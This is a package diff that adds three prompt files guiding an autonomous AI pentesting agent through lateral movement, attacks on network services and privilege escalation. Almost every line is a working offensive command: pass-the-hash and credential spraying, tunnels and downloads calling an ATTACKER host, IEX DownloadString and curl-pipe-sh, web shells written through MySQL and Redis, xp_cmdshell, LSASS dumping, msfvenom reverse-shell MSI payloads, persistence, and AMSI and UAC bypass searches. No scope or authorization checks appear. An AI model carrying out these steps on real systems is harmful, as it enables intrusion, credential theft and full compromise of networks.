pentesting 0.16.7 → 0.20.0

package/dist/prompts/techniques/lateral.md

@@ -0,0 +1,128 @@
+# Lateral Movement & Pivoting — Comprehensive Autonomous Guide
+
+> **Cross-ref**: shells.md (shell access), ad-attack.md (AD movement), privesc.md (escalation)
+
+##  Core Principle
+Initial access is one machine. Lateral movement = entire network.
+Every credential, hash, token, and key is a potential pivot point.
+
+##  Lateral Movement Techniques
+
+```
+LATERAL MOVEMENT MAP:
+│
+├── 1. Credential-Based Movement
+│   ├── SSH with credentials: ssh user@TARGET
+│   ├── SSH with key: ssh -i stolen_id_rsa user@TARGET
+│   ├── RDP: xfreerdp /v:TARGET /u:user /p:pass /cert:ignore
+│   ├── WinRM: evil-winrm -i TARGET -u user -p pass
+│   ├── PsExec: impacket-psexec user:pass@TARGET
+│   ├── WMI: impacket-wmiexec user:pass@TARGET
+│   ├── SMBExec: impacket-smbexec user:pass@TARGET
+│   ├── DCOM: impacket-dcomexec user:pass@TARGET
+│   ├── Pass-the-Hash: impacket-psexec -hashes :NTLM_HASH user@TARGET
+│   ├── Pass-the-Ticket: export KRB5CCNAME=ticket.ccache → impacket tools -k
+│   └── Credential spraying: try EVERY found credential on EVERY accessible service
+│
+├── 2. Network Pivoting (Access Hidden Networks)
+│   ├── SSH tunneling:
+│   │   ├── Local: ssh -L LOCAL_PORT:INTERNAL_HOST:INTERNAL_PORT user@PIVOT
+│   │   ├── Dynamic SOCKS: ssh -D 9050 user@PIVOT → proxychains
+│   │   ├── Remote: ssh -R ATTACKER_PORT:INTERNAL_HOST:PORT user@ATTACKER
+│   │   └── ProxyJump: ssh -J user@PIVOT user@INTERNAL
+│   │
+│   ├── Chisel (recommended for non-SSH):
+│   │   ├── Server (attacker): chisel server -p 8080 --reverse
+│   │   ├── Client (pivot): chisel client ATTACKER:8080 R:socks
+│   │   └── Then: proxychains nmap INTERNAL_SUBNET
+│   │
+│   ├── Ligolo-ng (easiest for complex pivoting):
+│   │   ├── Proxy (attacker): ligolo-proxy -selfcert -laddr 0.0.0.0:PORT
+│   │   ├── Agent (pivot): ligolo-agent -connect ATTACKER:PORT -ignore-cert
+│   │   └── Add routes to internal networks from attacker
+│   │
+│   ├── socat:
+│   │   ├── Port forwarding: socat TCP-LISTEN:LOCAL,fork TCP:INTERNAL:PORT
+│   │   └── Useful on systems without SSH
+│   │
+│   ├── sshuttle: sshuttle -r user@PIVOT INTERNAL_SUBNET/24
+│   │   └── Transparent proxy — no need for proxychains
+│   │
+│   ├── Metasploit: route add SUBNET MASK SESSION
+│   │   └── autoroute + socks_proxy modules
+│   │
+│   ├── Windows-specific:
+│   │   ├── netsh portproxy: netsh interface portproxy add v4tov4 listenport=P connectaddress=HOST connectport=P
+│   │   ├── plink.exe: plink -ssh -L LOCAL:INTERNAL:PORT user@PIVOT
+│   │   └── web_search("windows port forwarding pivoting techniques")
+│   │
+│   └── web_search("pivoting tunneling techniques {tool} hacktricks")
+│
+├── 3. File Transfer (Getting Tools Where They Need to Go)
+│   ├── Linux upload to target:
+│   │   ├── wget/curl: wget http://ATTACKER:PORT/file -O /tmp/file
+│   │   ├── Python HTTP server: python3 -m http.server PORT (on attacker)
+│   │   ├── scp: scp file user@TARGET:/tmp/
+│   │   ├── Netcat: nc -lvnp PORT > file (recv) | nc TARGET PORT < file (send)
+│   │   ├── Base64: base64 file → echo 'B64' | base64 -d > file
+│   │   └── /dev/tcp: cat < /dev/tcp/ATTACKER/PORT > file
+│   │
+│   ├── Windows upload to target:
+│   │   ├── certutil: certutil -urlcache -split -f http://ATTACKER/file file
+│   │   ├── PowerShell: IWR -Uri http://ATTACKER/file -OutFile file
+│   │   ├── bitsadmin: bitsadmin /transfer job /download /priority high URL file
+│   │   ├── SMB: copy \\ATTACKER\share\file . (start smbserver on attacker)
+│   │   └── In-memory: IEX(New-Object Net.WebClient).DownloadString('http://ATK/ps1')
+│   │
+│   └── web_search("file transfer techniques {OS} hacktricks")
+│
+├── 4. Internal Network Discovery
+│   ├── From compromised host:
+│   │   ├── ip a, ifconfig, ipconfig /all → network interfaces
+│   │   ├── ip route, route -n, route print → routing tables
+│   │   ├── arp -a → known hosts in local network
+│   │   ├── cat /etc/hosts, type C:\Windows\System32\drivers\etc\hosts
+│   │   ├── netstat -antp → active connections → more targets
+│   │   ├── Internal port scan: for i in $(seq 1 254); do ping -c1 -W1 10.0.0.$i; done
+│   │   └── proxychains nmap -sT -Pn -p- INTERNAL_SUBNET (through pivot)
+│   │
+│   └── EVERY new network found = FULL reconnaissance cycle (rerun everything)
+│
+├── 5. Credential Reuse Strategy
+│   ├── Every found credential → test on ALL reachable services:
+│   │   ├── SSH, RDP, WinRM, SMB, FTP, databases, web logins, VPN
+│   │   ├── crackmapexec smb SUBNET/24 -u user -p pass → mass test
+│   │   ├── Same password with different usernames
+│   │   ├── Same username with slight password variations
+│   │   └── Hash-based: Pass-the-Hash to all Windows targets
+│   │
+│   └── Credential chain: creds from host A → access host B → creds from B → access C
+│
+└── 6. Covert Channels
+    ├── DNS tunneling: iodine, dnscat2 → bypass network restrictions
+    ├── ICMP tunneling: icmpsh, ptunnel
+    ├── HTTP tunneling: through web proxies
+    ├── WebSocket tunneling: through WAF
+    └── web_search("covert channel exfiltration tunneling {protocol}")
+```
+
+##  Pivoting Workflow
+```
+Got access to new host?
+1. STABILIZE: upgrade shell, set up persistence (shells.md)
+2. ENUMERATE: network interfaces, routes, ARP, connections, hosts file
+3. LOOT: credentials, keys, tokens, hashes, config files
+4. PIVOT: set up tunnel/proxy to newly discovered networks
+5. SCAN: recon the new network through the pivot
+6. SPRAY: test found credentials on all new services
+7. REPEAT: for each new host compromised
+```
+
+##  Search Patterns
+```
+web_search("pivoting techniques {tool_name} hacktricks")
+web_search("file transfer {OS} one-liner techniques")  
+web_search("{protocol} tunneling tool pivot")
+web_search("proxychains {tool} through pivot")
+web_search("lateral movement {technique} detection evasion")
+```

package/dist/prompts/techniques/network-svc.md

@@ -0,0 +1,225 @@
+# Network Service Attacks — Comprehensive Autonomous Guide
+
+> **Cross-ref**: recon.md (discovery), exploit.md (exploitation), shells.md (getting shell)
+
+##  Core Principle
+Every open port is an attack surface. Every service has known and unknown vulnerabilities.
+**ALWAYS: service detection → version → IMMEDIATE web_search for exploits.**
+
+##  Service Attack Decision Engine
+
+```
+FOR EVERY OPEN PORT DISCOVERED:
+│
+├── 1. IDENTIFY: nmap -sV -sC -p PORT TARGET → exact version
+├── 2. SEARCH: web_search("{service} {version} exploit CVE hacktricks")
+├── 3. CHECK: searchsploit {service} {version}
+├── 4. READ: browse_url(hacktricks_result) → learn attack methodology
+├── 5. ATTACK: apply known techniques + search for bypasses
+├── 6. BLOCKED: evasion.md + payload_mutate → try encoded/alternative
+└── 7. CHAIN: combine with other findings (see strategy.md)
+```
+
+## 🌐 Web Services (80, 443, 8080, 8443)
+
+```
+Web Server Identified → FULL WEB PIPELINE:
+├── Technology: whatweb, wappalyzer, curl headers
+├── CMS detection → CMS-specific scanner:
+│   WordPress → wpscan --enumerate vp,vt,u --plugins-detection aggressive
+│   Drupal → droopescan scan drupal -u URL
+│   Joomla → joomscan -u URL
+│   web_search("{CMS} {version} exploit CVE")
+│
+├── Content discovery (MANDATORY):
+│   ├── ffuf -u URL/FUZZ -w /usr/share/wordlists/dirb/big.txt -fc 404
+│   ├── feroxbuster -u URL --smart --auto-tune
+│   ├── gobuster dir -u URL -w wordlist -x php,asp,aspx,jsp,html,js,txt,bak
+│   ├── Try backup extensions: .bak, .old, .orig, .save, .swp, ~, .tmp
+│   └── Add technology-specific extensions to wordlist
+│
+├── Sensitive file check:
+│   .env, .git/HEAD, .DS_Store, .htaccess, web.config,
+│   robots.txt, sitemap.xml, crossdomain.xml, clientaccesspolicy.xml,
+│   phpinfo.php, server-status, server-info, info.php, test.php
+│
+├── API discovery:
+│   /api, /api/v1, /swagger, /swagger-ui, /openapi.json,
+│   /graphql, /graphiql, /api-docs, /.well-known/
+│
+├── Virtual hosts: ffuf -H "Host: FUZZ.TARGET" -u http://IP -w subdomains.txt
+│
+└── Deep web testing → see injection.md, auth-access.md, file-attacks.md
+```
+
+## 🔐 Authentication Services
+
+```
+SSH (22):
+├── Version CVE: web_search("OpenSSH {version} CVE exploit")
+├── Username enumeration: web_search("openssh {version} user enumeration CVE")
+├── Brute force: hydra -l root -P wordlist ssh://TARGET
+├── Key-based: try found keys from other hosts
+├── Agent forwarding: if forwarded → hijack to access other hosts
+└── Misconfig: check for weak algorithms, passwordless login
+
+FTP (21):
+├── Anonymous: ftp TARGET → anonymous / (empty password)
+├── Version CVE: web_search("{ftpd} {version} exploit")
+├── Brute force: hydra -l admin -P wordlist ftp://TARGET
+├── Writable dirs: if serves web → upload web shell
+├── Bounce attack: use FTP to scan internal ports
+└── PASV mode: reveals internal IP addresses
+
+Telnet (23):
+├── Often unencrypted → capture credentials
+├── Default creds: web_search("{device} telnet default credentials")
+└── Version exploits: web_search("telnet {version} CVE")
+
+RDP (3389):
+├── BlueKeep: nmap --script rdp-vuln-ms12-020 -p 3389 TARGET
+├── Brute force: hydra -l admin -P wordlist rdp://TARGET
+├── NLA bypass: web_search("RDP NLA bypass technique")
+├── Credentials: try EVERY found credential
+└── Pass-the-Hash: xfreerdp /v:TARGET /u:admin /pth:NTLM -sec-nla
+
+VNC (5900-5910):
+├── No auth: vncviewer TARGET::5900
+├── Brute force: hydra -P wordlist -s 5900 TARGET vnc
+├── VNC authentication bypass: web_search("VNC auth bypass")
+└── Decrypt stored password: web_search("vnc password decrypt")
+
+WinRM (5985/5986):
+├── evil-winrm -i TARGET -u user -p pass
+├── Pass-the-Hash: evil-winrm -i TARGET -u user -H NTLM_HASH
+└── If valid creds → full PowerShell access
+```
+
+## 📂 File Sharing Services
+
+```
+SMB (139/445):
+├── Null session: smbclient -L //TARGET -N, smbmap -H TARGET -u '' -p ''
+├── Guest: smbmap -H TARGET -u 'guest' -p ''
+├── Enumerate shares: crackmapexec smb TARGET --shares -u '' -p ''
+├── Download everything: smbget -R smb://TARGET/share
+├── Writable share: upload payload (web shell if web-accessible, batch/exe if executed)
+├── Vulnerabilities:
+│   ├── EternalBlue (MS17-010): nmap --script smb-vuln-ms17-010
+│   ├── PrintNightmare: web_search("printnightmare exploit")
+│   ├── SMB relay: Responder + ntlmrelayx
+│   └── web_search("SMB {version} CVE exploit")
+├── Password spray: crackmapexec smb TARGET -u users.txt -p passwords.txt
+└── Enum: crackmapexec smb TARGET -u user -p pass --users --groups --loggedon-users
+
+NFS (2049):
+├── Show exports: showmount -e TARGET
+├── Mount: mount -t nfs TARGET:/share /mnt/nfs
+├── Check no_root_squash → create SUID binary on share → execute on target
+└── web_search("NFS exploitation no_root_squash")
+
+Rsync (873):
+├── List modules: rsync -av --list-only rsync://TARGET/
+├── Download: rsync -av rsync://TARGET/share/ ./loot/
+└── If writable: upload malicious crontab/authorized_keys
+```
+
+##  Database Services
+
+```
+MySQL (3306):
+├── mysql -h TARGET -u root (no password)
+├── mysql -h TARGET -u root -p'root' (common passwords)
+├── Brute force: hydra -l root -P wordlist mysql://TARGET
+├── UDF: web_search("mysql UDF privilege escalation")
+├── INTO OUTFILE: SELECT '<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/cmd.php'
+├── LOAD_FILE: SELECT LOAD_FILE('/etc/passwd')
+└── web_search("mysql {version} CVE exploit")
+
+PostgreSQL (5432):
+├── psql -h TARGET -U postgres (often trust/peer auth)
+├── COPY TO: COPY (SELECT 'shell') TO '/tmp/shell.sh'
+├── pg_read_file: SELECT pg_read_file('/etc/passwd')
+├── Large objects: read/write arbitrary files
+├── Extension: CREATE EXTENSION dblink → SSRF
+└── web_search("postgresql {version} RCE exploit")
+
+MSSQL (1433):
+├── impacket-mssqlclient DOMAIN/user:pass@TARGET
+├── xp_cmdshell: EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'
+├── UNC path: EXEC xp_dirtree '\\ATTACKER\share' → capture NTLMv2
+├── OLE automation: sp_OACreate for command execution
+├── CLR assembly: custom .NET DLL → load and execute
+└── web_search("MSSQL exploitation techniques {year}")
+
+Redis (6379):
+├── redis-cli -h TARGET (check no-auth)
+├── INFO → version, OS, memory
+├── Web shell: CONFIG SET dir /var/www/html; CONFIG SET dbfilename shell.php; SET x "<?php system($_GET['cmd']);?>"; SAVE
+├── SSH key: CONFIG SET dir /root/.ssh; CONFIG SET dbfilename authorized_keys; SET x "KEY_DATA"; SAVE
+├── Cron: CONFIG SET dir /var/spool/cron/crontabs; SET x "reverse_shell_cron"; SAVE
+├── Master-slave RCE: MODULE LOAD via replication
+└── web_search("redis {version} RCE exploit")
+
+MongoDB (27017):
+├── mongosh mongodb://TARGET:27017 (no auth)
+├── db.adminCommand({listDatabases:1})
+├── Dump all: for each db → show collections → db.collection.find()
+├── Authentication bypass: web_search("mongodb auth bypass")
+└── web_search("mongodb {version} CVE")
+
+Elasticsearch (9200):
+├── curl http://TARGET:9200/ → version info
+├── curl http://TARGET:9200/_cat/indices → list all indices
+├── curl http://TARGET:9200/_search?q=password → search for secrets
+├── RCE: web_search("elasticsearch {version} RCE CVE")
+└── Snapshot API → read filesystem
+```
+
+## 📧 Other Common Services
+
+```
+SMTP (25/587):
+├── User enum: VRFY/EXPN/RCPT TO
+├── Open relay: send from any address
+├── web_search("smtp user enumeration techniques")
+
+DNS (53):
+├── Zone transfer: dig axfr @TARGET domain.com
+├── Subdomain brute: fierce, dnsrecon, ffuf
+├── DNS cache snooping: information about internal infrastructure
+└── web_search("DNS exploitation techniques")
+
+SNMP (161/162):
+├── snmpwalk -v2c -c public TARGET
+├── Community brute: onesixtyone -c community.txt TARGET
+├── Writable OIDs → RCE: web_search("SNMP RCE write community")
+└── Version 3: credential brute force
+
+LDAP (389/636):
+├── Anonymous bind: ldapsearch -x -H ldap://TARGET -s base
+├── User/group enumeration
+├── LDAP injection: see injection.md
+└── Detailed methodology: web_search("LDAP pentesting hacktricks")
+
+Docker API (2375/2376):
+├── curl http://TARGET:2375/images/json (if unauthenticated)
+├── Full RCE: docker -H tcp://TARGET:2375 run -v /:/mnt alpine chroot /mnt
+└── Kubernetes: kubectl --server=https://TARGET:6443 get pods
+
+Kerberos (88):
+├── User enumeration: kerbrute userenum --dc DC -d DOMAIN users.txt
+├── AS-REP roasting: impacket-GetNPUsers (see ad-attack.md)
+├── Kerberoasting: impacket-GetUserSPNs (see ad-attack.md)
+└── web_search("kerberos attack techniques {year}")
+```
+
+##  Universal Service Search Pattern
+```
+web_search("{service_name} {version} exploit hacktricks")
+web_search("{service_name} pentesting cheatsheet")
+web_search("{service_name} {version} CVE PoC")
+web_search("{service_name} default credentials")
+web_search("{service_name} security misconfiguration")
+searchsploit {service_name} {version}
+```

package/dist/prompts/techniques/privesc.md

@@ -0,0 +1,186 @@
+# Privilege Escalation — Comprehensive Autonomous Guide
+
+> **Cross-ref**: shells.md (shell access), post.md (post-exploitation), lateral.md (lateral movement)
+
+##  Core Principle
+Initial access is usually low-privileged. Privesc is MANDATORY.
+There are hundreds of privesc vectors — automated tools + manual checks + SEARCH.
+
+## 🐧 Linux Privilege Escalation
+
+### Automated Enumeration (RUN FIRST)
+```
+ALWAYS run automated enumeration:
+├── LinPEAS: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
+├── LinEnum: web_search("linenum github") → download and run
+├── linux-exploit-suggester: web_search("linux exploit suggester github")
+├── pspy: monitor processes without root (cron jobs, other users' commands)
+└── If tools can't be transferred: run commands manually (see below)
+```
+
+### Manual Privesc Vector Map
+```
+LINUX PRIVESC CATEGORIES:
+│
+├── 1. Kernel Exploits
+│   ├── uname -a → kernel version
+│   ├── web_search("linux kernel {version} privilege escalation exploit")
+│   ├── searchsploit linux kernel {version}
+│   └── Dirty COW, Dirty Pipe, OverlayFS, etc.
+│
+├── 2. SUID/SGID Binaries
+│   ├── find / -perm -4000 -type f 2>/dev/null (SUID)
+│   ├── find / -perm -2000 -type f 2>/dev/null (SGID)
+│   ├── For EACH found binary: check GTFOBins
+│   │   web_search("{binary_name} gtfobins")
+│   ├── Custom SUID binaries: strings, ltrace, strace → find vulnerability
+│   └── Known exploitable SUID: nmap, vim, python, find, bash, cp, mv, etc.
+│
+├── 3. Sudo Misconfiguration
+│   ├── sudo -l (list what current user can sudo)
+│   ├── (ALL, !root) → CVE-2019-14287: sudo -u#-1 /bin/bash
+│   ├── NOPASSWD entries → check GTFOBins for each allowed command
+│   ├── sudo version: sudo --version → web_search("sudo {version} CVE")
+│   ├── LD_PRELOAD/LD_LIBRARY_PATH in env_keep → shared library injection
+│   └── web_search("sudo {command} privilege escalation gtfobins")
+│
+├── 4. Cron Jobs
+│   ├── cat /etc/crontab, ls -la /etc/cron.*, crontab -l
+│   ├── Writable cron scripts → replace with reverse shell
+│   ├── Wildcard injection: if cron uses * → inject flag files
+│   │   tar: --checkpoint + --checkpoint-action=exec=sh
+│   │   rsync: -e "sh shell.sh"
+│   ├── PATH exploitation: cron PATH writable → place malicious binary first
+│   └── pspy to discover hidden cron jobs and service activity
+│
+├── 5. Capabilities
+│   ├── getcap -r / 2>/dev/null
+│   ├── Exploitable: cap_setuid, cap_dac_override, cap_sys_admin, cap_net_raw
+│   ├── Python with cap_setuid: python -c 'import os; os.setuid(0); os.system("/bin/bash")'
+│   └── web_search("{binary} {capability} privilege escalation")
+│
+├── 6. Writable Files/Directories
+│   ├── /etc/passwd writable → add root user (openssl passwd -1 -salt xyz password)
+│   ├── /etc/shadow readable → crack hashes (hashcat/john)
+│   ├── .bashrc/.profile of other users → inject commands
+│   ├── Service config files → modify service to run as root
+│   ├── init scripts/systemd services writable → modify ExecStart
+│   └── find / -writable -type f 2>/dev/null | grep -v proc
+│
+├── 7. Path Hijacking
+│   ├── echo $PATH → are writable dirs BEFORE system dirs?
+│   ├── Service/script calls command without absolute path → create in writable dir
+│   ├── LD_LIBRARY_PATH → shared library hijacking
+│   └── Python library path → create malicious module with same name
+│
+├── 8. NFS Misconfiguration
+│   ├── cat /etc/exports → look for no_root_squash
+│   ├── Mount from attacker → create SUID binary → execute on target
+│   └── Web_search("NFS no_root_squash privilege escalation")
+│
+├── 9. Docker/Container Escape
+│   ├── In docker group? → docker run -v /:/mnt --rm -it alpine chroot /mnt sh
+│   ├── Privileged container? → mount /dev/sda1 /mnt → access host filesystem
+│   ├── Docker socket mounted? → full host access
+│   ├── cap_sys_admin → mount cgroup + notify_on_release → execute on host  
+│   └── web_search("docker container escape privilege escalation {year}")
+│
+├── 10. Sensitive Information
+│   ├── grep -r "password" /var/www/ /opt/ /home/ /etc/ 2>/dev/null
+│   ├── .env files, config files, database connection strings
+│   ├── .bash_history, .mysql_history, .sh_history
+│   ├── SSH keys: find / -name "id_rsa" -o -name "*.pem" 2>/dev/null
+│   ├── Stored credentials: /var/www/html/wp-config.php, .git/config
+│   └── Internal services with credentials → pivot to higher-priv user
+│
+└── 11. Miscellaneous
+    ├── Shared library injection via writable .so files
+    ├── AppArmor/SELinux misconfiguration → bypass
+    ├── dbus exploitation
+    ├── Polkit vulnerabilities (CVE-2021-4034 pkexec, CVE-2021-3560)
+    └── web_search("linux privilege escalation {year} new techniques")
+```
+
+## 🪟 Windows Privilege Escalation
+
+### Automated Enumeration
+```
+├── WinPEAS: upload and run (or run from memory via PowerShell)
+├── PowerUp.ps1: Invoke-AllChecks
+├── Seatbelt.exe: comprehensive security enumeration
+├── SharpUp.exe: check for common privesc vectors
+└── windows-exploit-suggester: compare systeminfo output
+```
+
+### Manual Privesc Vector Map
+```
+WINDOWS PRIVESC CATEGORIES:
+│
+├── 1. Kernel Exploits
+│   ├── systeminfo → OS version + patch level
+│   ├── web_search("windows {version} {build} privilege escalation exploit")
+│   ├── windows-exploit-suggester --update --systeminfo sysinfo.txt
+│   └── Notable: PrintNightmare, HiveNightmare, EternalBlue, JuicyPotato, etc.
+│
+├── 2. Service Exploits
+│   ├── Unquoted service paths: wmic service get name,pathname | findstr /i "C:"
+│   ├── Weak service permissions: sc qc <service>, accesschk.exe
+│   ├── Service binary replacement: replace binary of service running as SYSTEM
+│   ├── DLL Hijacking: missing DLL → place malicious DLL in search path
+│   └── Registry permissions: writable service registry keys
+│
+├── 3. Token Impersonation  
+│   ├── SeImpersonatePrivilege → JuicyPotato/PrintSpoofer/GodPotato
+│   ├── SeAssignPrimaryTokenPrivilege → token manipulation
+│   ├── whoami /priv → check all privileges
+│   └── web_search("windows token impersonation SeImpersonate exploit {year}")
+│
+├── 4. AlwaysInstallElevated
+│   ├── Check: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+│   ├── If enabled → create malicious .msi → runs as SYSTEM
+│   └── msfvenom -p windows/shell_reverse_tcp ... -f msi > evil.msi
+│
+├── 5. Stored Credentials
+│   ├── cmdkey /list → stored credentials
+│   ├── runas /savecred /user:admin "cmd /c reverse_shell.exe"
+│   ├── SAM/SYSTEM backup files → dump hashes
+│   ├── LSASS dump: mimikatz, Task Manager, procdump
+│   ├── Registry: reg save HKLM\SAM sam, reg save HKLM\SYSTEM system
+│   ├── Credential Manager, DPAPI protected blobs
+│   └── web_search("windows credential extraction techniques {year}")
+│
+├── 6. Scheduled Tasks
+│   ├── schtasks /query /fo LIST /v
+│   ├── Writable task scripts → replace with malicious code
+│   ├── Writable task binary paths → replace binary
+│   └── Missing binaries → create malicious binary at expected path
+│
+├── 7. Registry Exploits
+│   ├── AutoRun: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+│   ├── Writable registry keys → modify
+│   └── AppInit_DLLs, Image File Execution Options
+│
+├── 8. UAC Bypass
+│   ├── web_search("UAC bypass technique {year}")
+│   ├── fodhelper.exe bypass, eventvwr.exe bypass
+│   ├── DLL side-loading in auto-elevated processes
+│   └── UACME github → comprehensive UAC bypass collection
+│
+└── 9. Miscellaneous
+    ├── AMSI bypass → web_search("AMSI bypass {year}")
+    ├── AppLocker bypass → web_search("AppLocker bypass {year}")
+    ├── Network credential sniffing (Responder, Inveigh)
+    ├── Clipboard monitoring for passwords
+    └── web_search("windows privilege escalation {year} new techniques")
+```
+
+##  Universal Privesc Search Pattern
+```
+1. What OS/version? → web_search("{OS} {version} privilege escalation")
+2. What services? → web_search("{service} privilege escalation")
+3. What binaries? → web_search("{binary} gtfobins") OR web_search("{binary} lolbas")
+4. What's misconfigured? → interpret LinPEAS/WinPEAS output
+5. What's writable? → modify writable files/services for shell execution
+6. What credentials? → crack, spray, or reuse found credentials
+7. Still stuck? → web_search("{kernel_version} exploit CVE PoC")
+```